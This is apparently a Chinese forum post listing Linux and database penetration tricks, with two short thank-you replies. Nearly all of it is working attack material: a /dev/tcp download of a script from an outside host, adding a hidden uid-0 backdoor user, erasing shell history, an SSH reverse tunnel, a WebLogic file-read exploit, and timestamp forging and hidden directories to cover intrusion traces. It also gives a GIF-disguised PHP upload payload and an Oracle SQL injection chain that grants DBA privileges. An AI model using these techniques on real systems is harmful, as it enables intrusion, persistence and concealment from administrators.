linux常用滲透小技巧
linux常用滲透小技巧
1.無wget nc等下載工具時下載文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat<&5 > c.pl
複製代碼2.Linux添加uid為0的用戶useradd -o -u 0 cnbird
複製代碼3.bash去掉history記錄export HISTSIZE=0
export HISTFILE=/dev/null
複製代碼4.SSH反向鏈接ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定遠端伺服器SSH埠
複製代碼然後伺服器上執行ssh localhost -p 44即可
5.weblogic本地讀取文件漏洞curl -H "wl_request_type: wl_xml_entity_request" -H "xml-registryname: ../../" -H "xml-entity-path: config.xml" http://server/wl_management_internal2/wl_management
複製代碼6.apache查看虛擬web目錄./httpd -t -D DUMP_VHOSTS
複製代碼7.cvs滲透技巧CVSROOT/passwd UNIX SHA1的密碼文件
CVSROOT/readers
CVSROOT/writers
CVS/Root
CVS/Entries 更新的文件和目錄內容
CVS/Repository
複製代碼8.Cpanel路徑泄露/3rdparty/squirrelmail/functions/plugin.php
複製代碼9.修改上傳文件時間戳(掩蓋入侵痕迹)touch -r 老文件時間戳 新文件時間戳
複製代碼10.利用baidu和google搜索目標主機webshell
intitleHPJackal 1t1t
複製代碼11.包總補充
創建臨時「隱藏」目錄 mkdir /tmp/...
/tmp/...目錄在管理員有宿醉的情況下是「隱藏」的,可以臨時放點exp啥的
12.利用linux輸出繞過gif限制的圖片printf "GIF89a\x01\x00\x01\x00<?php phpinfo();?>" > poc.php
複製代碼
13.讀取環境變數對於查找信息非常有幫助/proc/self/environ
複製代碼14.最新的ORACLE 11提升用戶許可權(只要session許可權)DBMS_JVM_EXP_PERMS 中的IMPORT_JVM_PERMS
複製代碼判斷登陸許可權select * from session_privs;
CREATE SESSION
select * from session_roles;
select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY WHERE GRANTEE = 'GREMLIN(用戶名)';
DESC JAVA$POLICY$
DECLARE
POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT 'GRANT' USER(), 'SYS', 'java.io.FilePermission', '<
>', 'execute', 'ENABLE' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
connect / as sysdba
COL TYPE_NAME FOR A30;
COL NAME FOR A30;
COL_ACTION FOR A10;
SELECT TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY WHERE GRANTEE = '用戶';connect 普通用戶set serveroutput on
exec dbms_java.set_output(10000);
SELECT DBMS_JAVA.SET_OUTPUT_TO_JAVA('ID', 'oracle/aurora/rdbms/DbmsJava', 'SYS', 'writeOutputToFile', 'TEXT', NULL, NULL, NULL, NULL,0,1,1,1,1,0, 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO 用戶''; END;', 'BEGIN NULL; END;') FROM DUAL;
EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS('NO_SUCH_SUBSCRIPTION', SYSDATE());
set role dba;
select * from session_privs;
EXEC SYS.VULNPROC('FOO"||DBMS_JAVA.SET_OUTPUT_TO_SQL("ID","DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE""GRANT DBA TO PUBLIC"";DBMS_OUTPUT.PUT_LINE(:1);END;","TEXT")||"BAR');
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Test') FROM DUAL;
SET ROLE DBA;
複製代碼15. webLogic滲透技巧
四. Weblogin Script Tool(WLST)
寫入到\\config\\config.xml
1.進行修改:\wlserver_10.0\server\bin\setWLSenv.sh
複製代碼2.啟動WLSTjava weblogic.WLST
wls:/offline> connect('admin', 'admin', 't3://127.0.0.1:7001')
wls:/bbk/serverConfig> help()
wls:/bbk/serverConfig> edit()
wls:/bbk/serverConfig> cd('Servers')
wls:/bbk/serverConfig/Server-cnbird> cd('Log')
wls:/bbk/serverConfig/Server-cnbird/log> cd('Server-cnbird')
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit()
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> set('FileCount', '4')
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> save()
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> activate() 提交對應Active Change
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> disconnect()
wls:/offline> exit()
複製代碼3.批處理:
保存以上命令為cnbird.pyconnect('admin', 'admin', 't3://127.0.0.1:7001')
cd('Servers')
cd('Log')
cd('Server-cnbird')
startEdit()
set('FileCount', '4')
save()
複製代碼然後執行java weblogic.WLST cnbird.py
《解決方案》
謝謝分享 《解決方案》
記錄,做個標記;P